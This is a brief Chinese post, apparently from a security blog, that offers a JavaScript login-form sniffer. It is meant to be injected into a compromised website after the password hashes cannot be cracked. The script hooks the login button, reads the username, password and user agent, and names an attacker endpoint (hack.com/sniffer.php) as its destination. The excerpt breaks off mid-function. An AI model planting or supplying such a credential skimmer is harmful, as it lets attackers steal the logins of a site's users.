一段截获登录表单的用户名和密码的Javascript脚本。
拿下了网站的数据库却破不了MD5的情况下,可以尝试利用这段脚本截获登录表单的用户名和密码。
这段脚本需要调用到DOM,所以应把这段代码插在登录表单之后。
sniffer.js
/*
author: eT48
blog: http://blog.csdn.net/et48_sec
version: 1.0
*/
var http_server = "http://www.hack.com/sniffer.php";
document.getElementById("Login").οnclick=function(){sniffer()};
function sniffer()
{
var user = document.getElementById("username").value;
var pwd = document.getElementById("password").value;
var ua = navigator.userAgent;
v